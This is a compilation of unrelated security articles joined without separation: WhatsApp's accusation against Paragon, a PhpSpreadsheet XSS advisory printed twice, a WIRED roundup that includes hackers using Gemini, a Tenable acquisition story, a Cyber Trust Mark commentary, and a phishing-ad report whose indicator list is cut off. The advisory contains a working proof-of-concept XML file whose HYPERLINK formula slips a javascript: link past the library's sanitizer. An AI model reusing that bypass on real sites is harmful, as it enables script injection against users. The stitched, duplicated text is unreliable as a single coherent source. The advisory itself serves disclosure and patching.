WhatsApp has accused professional spyware company Paragon of spying on a select group of users.

WhatsApp has accused the professional spyware company Paragon of spying on a select group of users.

WhatsApp, the Meta-owned, end-to-end encrypted messaging platform, said it has reliable information that nearly 100 journalists and other “members of civil society” were targets of a spyware campaign conducted by the Israeli spyware company.

“Members of civil society” usually refers to individuals and organizations that operate independently from government and business sectors, often those advocating for public interests, influencing policy, or holding governments accountable.

In a statement, a WhatsApp spokesperson said:

> “This is the latest example of why spyware companies must be held accountable for their unlawful actions. WhatsApp will continue to protect people’s ability to communicate privately”

Many such targets use WhatsApp because they rely on the end-to-end encryption (E2EE) that it offers by default to safeguard communications, protect sources, and shield sensitive information from prying eyes.

The targets were spread over two dozen countries, including several in Europe. WhatsApp notified the possibly affected accounts through its own app. The platform has the ability notify users about sensitive matters directly via a WhatsApp chat. In such a case, the chat will include a system message at the top of the chat that verifies that it originates from the official account of WhatsApp Support, and there will be a blue checkmark next to WhatsApp Support at the top of the chat.

A spokesperson stated that WhatsApp was able to identify and block the attack vector which Paragon used in these attacks. Reportedly, the hacking campaign used malicious PDFs sent via WhatsApp groups to compromise targets. The attack apparently required no action from the target, a so-called zero-click attack.

Researchers have often compared Paragon’s Graphite spyware to the Pegasus spyware, a deeply invasive tool developed by a company called NSO that WhatsApp has been fighting in court since 2019. But up until now, Paragon was able to keep a low profile. This is the first time that Paragon has been publicly linked to a hacking campaign that allegedly targeted journalists and members of civil society.

WhatsApp has sent Paragon Solutions a cease-and-desist letter following the series of attempted attacks. Meta also notified Canadian privacy watchdog Citizen Lab. Citizen Lab’s researcher John Scott-Railton says they observed this campaign and have started an investigation.

The attacks reportedly took place in December 2024. If you are a potential target and you received a suspicious PDF you can reach out to Citizen Lab or the non-profit digital security helpline AccessNow.

If you received a WhatsApp notification about the attack, you can contact WhatsApp Support in-app by clicking here.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 WhatsApp says Paragon is spying on specific users 

**Product:** PhpSpreadsheet
**Version:** 3.8.0
**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)
**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link
**Impact:** executing arbitrary JavaScript code in the browser
**Vulnerable component:** class `PhpOffice\PhpSpreadsheet\Writer\Html`, method `generateRow`
**Exploitation conditions:** a user viewing a specially generated xml file
**Mitigation:** additional sanitization of special characters in a string
**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**

# Research

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.
The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

*Listing 4. Source code on the server*

```
<?php

require __DIR__ . '/vendor/autoload.php';

$inputFileType = 'Xml';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  

$inputFileName = './doc/file.xml';
$spreadsheet = $reader->load($inputFileName); 
 
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
print($writer->generateHTMLAll());
```
The contents of the xml file - `./doc/file.xml`

*Listing 5. The contents of the xml file*
```
<?xml version="1.0"?> 
<?mso-application progid="Excel.Sheet"?> 
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:o="urn:schemas-microsoft-com:office:office" 
 xmlns:x="urn:schemas-microsoft-com:office:excel" 
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:html="http://www.w3.org/TR/REC-html40"> 
 <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
  <Author>author</Author> 
  <LastAuthor>author</LastAuthor> 
  <Created>2015-06-05T18:19:34Z</Created> 
  <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
  <Version>16.00</Version> 
 </DocumentProperties> 
 <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
  <AllowPNG/> 
 </OfficeDocumentSettings> 
 <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
  <WindowHeight>11020</WindowHeight> 
  <WindowWidth>19420</WindowWidth> 
  <WindowTopX>32767</WindowTopX> 
  <WindowTopY>32767</WindowTopY> 
  <ProtectStructure>False</ProtectStructure> 
  <ProtectWindows>False</ProtectWindows> 
 </ExcelWorkbook> 
 <Styles> 
  <Style ss:ID="Default" ss:Name="Normal"> 
   <Alignment ss:Vertical="Bottom"/> 
   <Borders/> 
   <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
   <Interior/> 
   <NumberFormat/> 
   <Protection/> 
  </Style> 
  <Style ss:ID="s16"> 
   <NumberFormat ss:Format="General Date"/> 
  </Style> 
 </Styles> 
 <Worksheet ss:Name="Лист1"> 
  <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
   x:FullRows="1" ss:DefaultRowHeight="14.5"> 
   <Column ss:AutoFitWidth="0" ss:Width="194"/> 
   <Row> 
     <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
   </Row> 
  </Table> 
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
   <PageSetup> 
    <Header x:Margin="0.3"/> 
    <Footer x:Margin="0.3"/> 
    <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
   </PageSetup> 
   <Selected/> 
   <TopRowVisible>1</TopRowVisible> 
   <Panes> 
    <Pane> 
     <Number>3</Number> 
     <ActiveRow>6</ActiveRow> 
    </Pane> 
   </Panes> 
   <ProtectObjects>False</ProtectObjects> 
   <ProtectScenarios>False</ProtectScenarios> 
  </WorksheetOptions> 
 </Worksheet>
</Workbook>
```

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.
 
*Figure 4. Generating a link bypassing a regular expression*
![fig4](https://github.com/user-attachments/assets/9bd2299d-9045-4cab-b3a5-cbcaf3bbe23c)

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.
 
*Figure 5. Response from the server with a special character*
![fig5](https://github.com/user-attachments/assets/3fecbd9b-b08e-4797-9f5d-06911f857059)

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

*Figure 6. Executing JavaScript code*
<img width="595" alt="fig6" src="https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1" />
_____________________________________________

## Credit

Igor Sak-Sakovskiy (Positive Technologies)


**Product:** PhpSpreadsheet  
**Version:** 3.8.0  
**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')  
**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)  
**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)  
**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link  
**Impact:** executing arbitrary JavaScript code in the browser  
**Vulnerable component:** class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow  
**Exploitation conditions:** a user viewing a specially generated xml file  
**Mitigation:** additional sanitization of special characters in a string  
**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**

**Research**

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.  
The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

_Listing 4. Source code on the server_

    <?php
    
    require __DIR__ . '/vendor/autoload.php';
    
    $inputFileType = 'Xml';
    $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  
    
    $inputFileName = './doc/file.xml';
    $spreadsheet = $reader->load($inputFileName); 
     
    $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
    print($writer->generateHTMLAll());
    

The contents of the xml file - ./doc/file.xml

_Listing 5. The contents of the xml file_

    <?xml version="1.0"?> 
    <?mso-application progid="Excel.Sheet"?> 
    <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
     xmlns:o="urn:schemas-microsoft-com:office:office" 
     xmlns:x="urn:schemas-microsoft-com:office:excel" 
     xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
     xmlns:html="http://www.w3.org/TR/REC-html40"> 
     <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
      <Author>author</Author> 
      <LastAuthor>author</LastAuthor> 
      <Created>2015-06-05T18:19:34Z</Created> 
      <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
      <Version>16.00</Version> 
     </DocumentProperties> 
     <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
      <AllowPNG/> 
     </OfficeDocumentSettings> 
     <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
      <WindowHeight>11020</WindowHeight> 
      <WindowWidth>19420</WindowWidth> 
      <WindowTopX>32767</WindowTopX> 
      <WindowTopY>32767</WindowTopY> 
      <ProtectStructure>False</ProtectStructure> 
      <ProtectWindows>False</ProtectWindows> 
     </ExcelWorkbook> 
     <Styles> 
      <Style ss:ID="Default" ss:Name="Normal"> 
       <Alignment ss:Vertical="Bottom"/> 
       <Borders/> 
       <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
       <Interior/> 
       <NumberFormat/> 
       <Protection/> 
      </Style> 
      <Style ss:ID="s16"> 
       <NumberFormat ss:Format="General Date"/> 
      </Style> 
     </Styles> 
     <Worksheet ss:Name="Лист1"> 
      <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
       x:FullRows="1" ss:DefaultRowHeight="14.5"> 
       <Column ss:AutoFitWidth="0" ss:Width="194"/> 
       <Row> 
         <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
       </Row> 
      </Table> 
      <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
       <PageSetup> 
        <Header x:Margin="0.3"/> 
        <Footer x:Margin="0.3"/> 
        <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
       </PageSetup> 
       <Selected/> 
       <TopRowVisible>1</TopRowVisible> 
       <Panes> 
        <Pane> 
         <Number>3</Number> 
         <ActiveRow>6</ActiveRow> 
        </Pane> 
       </Panes> 
       <ProtectObjects>False</ProtectObjects> 
       <ProtectScenarios>False</ProtectScenarios> 
      </WorksheetOptions> 
     </Worksheet>
    </Workbook>
    

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.

_Figure 4. Generating a link bypassing a regular expression_  

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.

_Figure 5. Response from the server with a special character_  

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

_Figure 6. Executing JavaScript code_  

**Credit**

Igor Sak-Sakovskiy (Positive Technologies)

**References**

*   GHSA-r57h-547h-w24f
*   PHPOffice/PhpSpreadsheet@cde2926

GHSA-r57h-547h-w24f: PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

Plus: WhatsApp discloses nearly 100 targets of spyware, hackers used the AT&T breach to hunt for details on US politicians, and more.

The rapid rise of DeepSeek, a Chinese generative AI platform, heightened concerns this week over the United States’ AI dominance as Americans increasingly adopt Chinese-owned digital services. With ongoing criticism over alleged security issues posed by TikTok’s relationship to China, DeepSeek’s own privacy policy confirms that it stores user data on servers in the country.

Meanwhile, security researchers at Wiz discovered that DeepSeek left a critical database exposed online, leaking over 1 million records, including user prompts, system logs, and API authentication tokens. As the platform promotes its cheaper R1 reasoning model, security researchers tested 50 well-known jailbreaks against DeepSeek’s chatbot and found lagging safety protections as compared to Western competitors.

Brandon Russell, the 29-year-old cofounder of the Atomwaffen Division, a neo-Nazi guerrilla organization, is on trial this week over an alleged plot to knock out Baltimore’s power grid and trigger a race war. The trial provides a look into federal law enforcement’s investigation into a disturbing propaganda network aiming to inspire mass casualty events in the US and beyond.

An informal group of West African fraudsters calling themselves the Yahoo Boys are using AI-generated news anchors to extort victims, producing fabricated news reports falsely accusing them of crimes. A WIRED review of Telegram posts reveals that these scammers create highly convincing fake news broadcasts to pressure victims into paying ransoms by threatening public humiliation.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

According to a report by The Wall Street Journal, hacking groups with known ties to China, Iran, Russia, and North Korea are leveraging AI chatbots like Google Gemini to assist with tasks such as writing malicious code and researching potential attack targets.

While Western officials and security experts have long warned about AI's potential for malicious use, the Journal, citing a Wednesday report from Google, noted that the dozens of hacking groups across more than 20 countries are primarily using the platform as a research and productivity tool—focusing on efficiency rather than developing sophisticated and novel hacking techniques.

Iranian groups, for instance, used the chatbot to generate phishing content in English, Hebrew, and Farsi. China-linked groups used Gemini for tactical research into technical concepts like data exfiltration and privilege escalation. In North Korea, hackers used it to draft cover letters for remote technology jobs, reportedly in support of the regime’s effort to place spies in tech roles to fund its nuclear program.

This is not the first time foreign hacking groups have been found using chatbots. Last year, OpenAI disclosed that five such groups had used ChatGPT in similar ways.

**WhatsApp Reveals Targets of Paragon Spyware**

On Friday, WhatsApp disclosed that nearly 100 journalists and civil society members were targeted by spyware developed by the Israeli firm Paragon Solutions. The Meta-owned company alerted affected individuals, stating with “high confidence” that at least 90 users had been targeted and “possibly compromised,” according to a statement to The Guardian. WhatsApp did not reveal where the victims were located, including whether any were in the United States.

The attack appears to have used a “zero-click” exploit, meaning victims were infected without needing to open a malicious link or attachment. Once a phone is compromised, the spyware—known as Graphite—grants the operator full access, including the ability to read end-to-end encrypted messages sent via apps like WhatsApp and Signal.

While it remains unclear who orchestrated the attack, Paragon’s spyware is marketed to government clients, and is similar to that of NSO Group, the controversial Israeli firm behind the Pegasus spyware.

In October, WIRED reported that US Immigration and Customs Enforcement had signed a $2 million contract with the Israeli firm. After our reporting, ICE later issued a stop-work order to review whether the deal complied with a Biden administration executive order restricting the use of spyware to limited circumstances. That 2023 executive order remains in effect, despite the Trump administration rescinding dozens of Biden-era policies in Trump’s first two weeks in office.

**Hackers Used AT&T Breach Data to Hunt for Info on US Politicians**

Hackers behind last year’s massive AT&T data breach sifted through stolen records in search of information linked to high-profile figures, including members of the Trump family, Vice President Kamala Harris, and Jeanette Rubio, the wife of Senator Marco Rubio, according to 404 Media.

In April 2024, hackers breached AT&T’s instance of Snowflake, a widely used data warehousing tool, gaining access to 50 billion records of calls and text messages. According to 404Media, the hackers then enriched the dataset using publicly available tools, appending names to phone numbers to make the records more identifiable as part of a plant to launch a lookup tool that would allow anyone to search the stolen records—for a fee.

Two individuals have been identified as allegedly responsible for the breach: Connor Riley Moucka, a Canadian national who was arrested in November; and John Binns, an American hacker residing in Turkey who was previously arrested for a 2021 breach of T-Mobile. They are linked to a loosely connected online network of criminals called the Com.

**Mystery Drones Over New Jersey Were ‘Authorized,’ White House Says**

At the first press briefing of Donald Trump’s second administration, White House press secretary Karoline Leavitt addressed the surge of unexplained drones spotted over New Jersey and other parts of the East Coast late last year. Leavitt said President Trump personally briefed her on the issue in the Oval Office, stating, “After research and study, the drones that were flying over New Jersey in large numbers were authorized to be flown by the FAA for research and various other reasons.”

Leavitt downplayed concerns about a foreign threat, adding, “In time, it got worse due to curiosity. This was not the enemy.”

The wave of sightings began just before Thanksgiving, with witnesses reporting unidentified drones flying in formation night after night. Some were spotted hovering over military installations and water reservoirs. Within weeks, the FBI received more than 5,000 reports of drone activity—only about 100 cases warranted further investigation.

Despite mounting public pressure, officials offered few definitive answers. By mid-December, a coalition of federal agencies—including the Department of Homeland Security, the FBI, and the Department of Defense—issued a joint statement concluding that the reported aerial objects were a mix of lawful drones, airplanes, helicopters, and stars.

Foreign Hackers Are Using Google’s Gemini in Attacks on the US

The deal, expected to close this quarter, will give Tenable One Exposure Management much-needed integration with over 100 third-party security tools and platforms.

Source: Maxiphoto via iStock Photo

Tenable is poised to fill significant gaps in its exposure management platform with its agreement to acquire Vulcan Cyber.

Tenable said it was the first vendor to add exposure management to its vulnerability management platform when it launched the Tenable One Exposure Management Platform in 2022. However, Tenable's exposure management has lacked the ability to share telemetry with IT and security tools from other vendors. This is where Vulcan Cyber's exposure management offering, which can integrate with more than 100 third-party security tools, can make a difference for Tenable.

"This will give organizations the ability to have insights across the attack surface, not just what you point at Tenable but also that third-party data," says Tenable senior VP of products Jason Merrick. "At the end of the day, our focus here is helping organizations move as they're progressing from vulnerability management to exposure management and then gaining that context where they can make better decisions."

**Adding Exposure Management to Vulnerability Management**

Unlike vulnerability management offerings that are designed to discover, assess, prioritize, and mitigate threats in IT assets, exposure management considers an organization's cybersecurity posture and performs risk assessment.

Several Tenable rivals also offer exposure management as part of their product portfolios. For example, CrowdStrike added Exposure Management to its Falcon XDR platform in 2023, and Microsoft recently added exposure management to Microsoft Defender, which notably includes third-party connectors. On the same day Tenable announced its Vulcan Cyber plans, exposure management platform provider CYE acquired Solvo.

Omdia analyst Andrew Braunberg believes Vulcan Cyber will bring needed features to Tenable One that its rivals are now touting.

"While Tenable has been talking about exposure management for as long as anyone, it still often has the feel of an old legacy vulnerability management company," Braunberg says. "Vulcan has always seen exposure management as where the market was headed and has taken an impressively open approach to pulling in asset and exposure data and working to broadly support remediation, orchestration, and automation."

Tenable's Merrick acknowledges that Microsoft's licensing model with its M365 E3 and E5 plans give Microsoft an advantage.

"They can throw a lot of free stuff at this, and there are many organizations that are Microsoft-only shops," he says. "CrowdStrike, too, is growing and expanding. But I also think that this is an opportunity for Tenable to differentiate, to continue being that source of truth, to provide better analytic capability, and to tie these things together. Because at the end of the day, this forces us, from a product standpoint, to continue to innovate and deliver new capabilities."

Organizations are only beginning to expand their focus on vulnerability management to include exposure management, Merrick adds.

"I think we're in the first inning of exposure management," he says. "More and more, organizations are starting to talk about this."

The deal, announced on Wednesday, calls for Tenable to pay $147 million in cash and $3 million in restricted stock to Vulcan Cyber. While Merrick is unable to discuss specific integration plans before the deal closes, which the company anticipates will take place this quarter, the 100-plus connectors to third-party systems were a key impetus for the deal.

"We have always been envisioning being able to ingest third-party data into our exposure management platform like we've done with our vulnerability management solution," he says. "We've already built the data model specifically to accept and bring in third-party data. So we want to be able to go and fast-track that. Once we close, this is going to be the big focus for us in 2025."

**About the Author**

Contributing Writer

Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures. Previously, he was editor-in-chief of Redmond magazine and contributed to its sister titles Redmond Channel Partner, Application Development Trends, and Virtualization Review. Earlier, he held editorial roles with CommunicationsWeek, InternetWeek, and VARBusiness. Jeff is based in the New York City suburb of Long Island.

Tenable to Acquire Vulcan Cyber to Boost Exposure Management Focus

The Cyber Trust Mark has the potential to change how we define and measure security at the endpoint level. But potential isn't enough.

Source: Wavebreakmedia Ltd FUS1507-1 via Alamy Stock Photo

COMMENTARY

In the chaotic world of cybersecurity, where attackers innovate faster than we can patch and secure endpoints, trust often feels like a mirage. Between deciphering new attack patterns and troubleshooting operational headaches, I can't help but wonder: How can we rebuild endpoint trust in an era of AI-driven attacks and hybrid work environments?

The Cyber Trust Mark, a recently proposed initiative to label trustworthy devices, claims to offer clarity and build consumer and corporate confidence in this digital chaos. But will it stand the test of enterprise realities, or will it join the graveyard of good ideas that failed to scale? I believe it has potential — but only if paired with actionable AI-driven insights and dynamic enforcement.

**AI: Savior of Cybersecurity or Saboteur?**

AI tools have been a game changer for cybersecurity. They can autonomously detect anomalies, triage vulnerabilities at scale, and even predict attack vectors. A 2023 study by the MIT Technology Review Insights revealed that 62% of security leaders are leveraging AI to speed up decision-making in threat detection. From my vantage point, tools like these are indispensable — particularly when dealing with sprawling endpoint ecosystems.

However, there's a darker side to AI. A 2023 report by ISACA underscores how attackers are weaponizing AI to create polymorphic malware and bypass traditional security controls. AI is only as good as the data it's trained on, and enterprise data environments are far from perfect. According to the article "Understanding and Avoiding AI Failures: A Practical Guide" by Robert Williams and Roman Yampolskiy, published in Philosophies, AI often fails in environments with noisy or incomplete data, resulting in false positives that drain security team resources. This duality — AI as both defender and enabler of threats — is precisely why human oversight remains irreplaceable in endpoint management.

**The Cyber Trust Mark: Promising or Hollow?**

The Cyber Trust Mark, proposed by the Federal Communications Commission (FCC), aims to provide a transparent labeling system for secure devices — like an energy efficiency rating but for cybersecurity. According to an analysis by the National Institute of Standards and Technology (NIST), this initiative could bridge the gap between manufacturers and enterprises, offering a clear standard for endpoint security. In theory, this framework should make it easier for vulnerability analysts like me to prioritize risk, focus remediation efforts, and communicate effectively with stakeholders.

But here's my concern: Standards are only as effective as their enforcement. The article "Role of Advanced Cybersecurity Frameworks in Safeguarding Data Integrity and Consumer Trust in Digital Commerce and Enterprise Systems," published on ResearchGate, warns of the dangers of static certifications, which can quickly become outdated in a dynamic threat landscape. To be meaningful, the Cyber Trust Mark must go beyond static labeling. It must adapt in real-time, factoring in telemetry data and ongoing compliance audits. Otherwise, it risks becoming another checkbox exercise in an industry already overrun with compliance fatigue.

**Lessons From the Endpoint Trenches**

Let me paint a picture from my own experience. Recently, while managing endpoint vulnerabilities for a critical application, I encountered a legacy system — a dinosaur in tech terms. AI-driven tools flagged it as "secure" because it met basic encryption standards, but manual analysis revealed vulnerabilities in its outdated protocols. This is a recurring theme in VM: Tools can't handle nuance, and legacy systems refuse to die. A similar fate could await the Cyber Trust Mark if it fails to address the messy realities of enterprise environments.

So how do we avoid this? I propose the following:

1.  AI-augmented oversight: AI can provide baselines, but human analysts must validate its findings. Studies from Carnegie Mellon University confirm that a hybrid approach reduces false positives by 30% and could provide deeper insights.
    
2.  Dynamic trust scoring: The Cyber Trust Mark should evolve based on real-time telemetry.
    
3.  Collaboration across ecosystems: Public-private partnerships are essential to make the Cyber Trust Mark universally meaningful. The World Economic Forum's 2023 cybersecurity framework emphasizes how global standards succeed only when multiple stakeholders align on enforcement and data sharing.
    

**The Cyber Trust Mark Needs to Be More Than a Marketing Label**

The Cyber Trust Mark has the potential to change how we define and measure security at the endpoint level. But potential isn't enough. If this initiative is going to work, it needs teeth: dynamic scoring, transparent enforcement, and continuous oversight. AI can be a powerful ally, but we can't rely on it alone. The human element — our judgment, our experience, our ability to see through the cracks — is what ultimately will determine the success of this framework.

Here's what I'd like to see: a Cyber Trust Mark that isn't afraid to fail fast and learn faster. A system that acknowledges the imperfect trial-and-error nature of enterprise security. And most importantly, a trust framework that doesn't just label endpoints as "secure," but tells us why they're secure — and for how long.

**Call to Action: Rebuilding Trust Together**

Security professionals, developers, vendors, policymakers — we all have a stake in making this work. As someone on the frontlines of endpoint management, I challenge you to weigh in: What does trust mean to you, and how do we operate it in a rapidly evolving threat landscape? Let's not just label trust — let's build it.

**About the Author**

Security Specialist, IBM

Chris "CT" Thomas currently is security specialist for IBM. Starting his career in healthcare technology, he developed a strong foundation in protecting critical systems and sensitive data. As an email security specialist, he expanded my expertise in defending communication channels against evolving threats. At IBM, he sharpened his skills in vulnerability management, focusing on identifying and mitigating risks to secure enterprise systems. Curiosity drives his work in cybersecurity — he is passionate about breaking down complex systems to understand and improve them. His current focus is on VM, AI, and disaster recovery for AI systems and endpoints, ensuring resilience and security in dynamic environments. When he's not tackling cybersecurity challenges, you’ll find him running or enjoying a great slice of pizza.

Can AI &amp; the Cyber Trust Mark Rebuild Endpoint Confidence?

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft...

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft advertisers. These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft’s advertising platform.

Microsoft does purchase ad space on its rival’s dominant search engine; however, we found Google sponsored results for “Microsoft Ads” (formerly known as Bing Ads) that contained malicious links created by impostors.

Through shared artifacts, we were able to identify additional phishing infrastructure targeting Microsoft accounts going back to a couple of years at least. We have reported these incidents to Google.

**Fake Microsoft Ads caught on Google Search**

Microsoft made an estimated $12.2 billion in search and news advertising revenues (including Bing) in 2023, which pales in comparison to its rival, Google, holding a much larger share of the search engine market.

Since the advertising ecosystem allows for an open competition between brands, Microsoft is trying to get traffic and earn clicks from Google searches. During our investigation, we saw sponsored results for Microsoft Ads and Bing Ads that managed to slip through Google’s security checks:

Figure 1: A Google search for ‘microsoft ads’

**Redirection, cloaking and Cloudflare**

The threat actors are using different techniques to evade detection and drop traffic from bots, security scanners and crawlers. Unwanted IP addresses (_e.g._ VPNs) are immediately redirected to a bogus marketing website (_Figure 2_). This is also known as a “white page”, meaning it looks innocent and hides its maliciousness.

Figure 2: Cloaking page

Users that appear to be genuine are presented with a Cloudflare challenge to verify they are human. This is a legitimate instance of Cloudflare, unlike the “ClickFix” type-of-attacks that have become very common place and trick people into pasting and executing malicious code.

Figure 3: Cloudflare verification

**Rickroll for the cheaters**

After a successful Cloudflare check, users are redirected to the final phishing page via a special URL, that acts as some sort of entry point for the malicious domain _ads\[.\]mcrosoftt\[.\]com_. You can see the network requests related to this redirection chain in _Figure 4_ below.

Figure 4: Network traffic for full redirection

If you were to visit that domain directly instead of going through the proper ad click you’d be greeted with a rickroll, an internet meme designed to make fun of someone. The sandbox for the web urlscan.io has several examples of crawl requests for URLs on that server (_37.120.222\[.\]165_) that all went to the rickroll.

Figure 5: Rickroll redirect

**Phishing page**

After much subversion, real victims finally see the phishing page for the Microsoft Advertising platform. The full URL in the address bar is meant to imitate the legitimate one (_ads.microsoft.com_).

Figure 6: Microsoft Advertising phishing page

The phishing page gives user a fake error message enticing them to reset their password and seemingly tries to get past 2-Step verification as well. Handling 2FA has become a standard feature in most phishing kits, due to the rise in user adoption of this additional security layer.

Figure 7: Phishing steps

**Larger campaign**

Going back to _urlscanio_, we fed it the special entry URL and it was able to navigate to the phishing page. From there, we can look at the various web requests and find something to pivot on in order to identify additional infrastructure.

The _favicon.ico_ file is one starting point and we can query for any scans that match its hash, excluding the official Microsoft domain. The results show that in the past week, there were several other domains that appear to be related to the theft of Microsoft Ads accounts.

But this campaign appears to go back further at least a couple of years and maybe more, although it becomes somewhat tricky to know if the malicious infrastructure is tied to the same threat actors. It’s worth noting that several of the domains are either hosted in Brazil or have the ‘_.com.br_‘ Brazilian top-level domain.

What we discovered may only be the tip of the iceberg; by starting to investigate compromised advertiser accounts we may very well have opened Pandora’s box. This isn’t only Google or Microsoft ad accounts we are talking about, but potentially for Facebook, and many others. Of course, our scope so far has been Google Search, but we know that other platforms are rife with such phishing attacks.

These recent malvertising campaigns highlight the ongoing threat of phishing through online advertising. While tech companies like Google work to combat these issues, users must remain vigilant. Here are some key steps you can take to protect yourself:

*   **Verify URLs:** Always carefully examine the URL in your browser’s address bar before entering any credentials. Scrutinize URLs for inconsistencies or misspellings.
*   **Use 2-Step verification wisely:** it adds an extra layer of security to your accounts, but you still need to pay attention to requests before granting them access.
*   **Regularly monitor your accounts:** Check your advertising accounts for any suspicious activity such as changes in administrator accounts.
*   **Report Ads:** If you encounter a suspicious ad, report it to for the benefit of other users.

**We don’t just report on threats—we block them**

_Malwarebytes Browser Guard offers traditional ad-blocking augmented with advanced heuristic detection. Download it today._

**Indicators of Compromise**

The following IOCs are comprised of domains that shared attributes with our initial phishing page, including the favicon and images. Some of them go back further but are provided for threat hunters who may wish to further investigate these campaigns.

30yp\[.\]com  
aboutadvertselive\[.\]com  
aboutblngmicro\[.\]cloud  
account-microsoft\[.\]online  
account-microsoft\[.\]site  
account-mircrosoft-ads\[.\]com  
account\[.\]colndcx-app\[.\]com  
accounts-ads\[.\]site  
accounts-mircrosoft-ads\[.\]online  
acount-exchang\[.\]store  
admicrosoft\[.\]com  
admicrsdft\[.\]com  
ads-adversitingb\[.\]com  
ads-dsas\[.\]site  
ads-microsoft\[.\]click  
ads-microsoft\[.\]coachb-learning\[.\]com  
ads-microsoft\[.\]live  
ads-microsoft\[.\]lubrine\[.\]com\[.\]br  
ads-microsoft\[.\]online  
ads-microsoft\[.\]shop  
ads-microsoftz\[.\]online  
ads-miicrosoft\[.\]com  
ads-mlcrosft\[.\]com  
ads-mlcrosoft-com\[.\]blokchaln\[.\]com  
ads\[.\]microsoft\[.\]com\[.\]euroinvest\[.\]ge  
ads\[.\]mlcr0soft\[.\]com  
ads\[.\]mlcrosoft\[.\]com\[.\]ciree\[.\]com\[.\]br  
ads\[.\]mlcrosoft\[.\]com\[.\]poezija\[.\]com\[.\]hr  
ads\[.\]rnlcrosoft\[.\]com\[.\]euroinvest\[.\]ge  
adslbing\[.\]com  
adsmicro\[.\]exchangefastex\[.\]cloud  
adsmicrosoft\[.\]shop  
adsverstoni\[.\]com  
advertiseliveonline\[.\]com  
advertising-bing\[.\]site  
advertising-mlcrosoft\[.\]org  
adverts2023\[.\]online  
advertsingsinginbing\[.\]com  
agency-wasabi\[.\]com  
app\[.\]beefylswap\[.\]top  
bîlkub\[.\]com  
bing-ads\[.\]com  
bing\[.\]login-acount\[.\]me  
bitmax-us\[.\]com  
blngad\[.\]online  
blseaccount\[.\]cloud  
bltrue\[.\]colnhouse-fr\[.\]us  
côinlíst\[.\]online  
colneex-plalform\[.\]cloud  
connec-exchan\[.\]site  
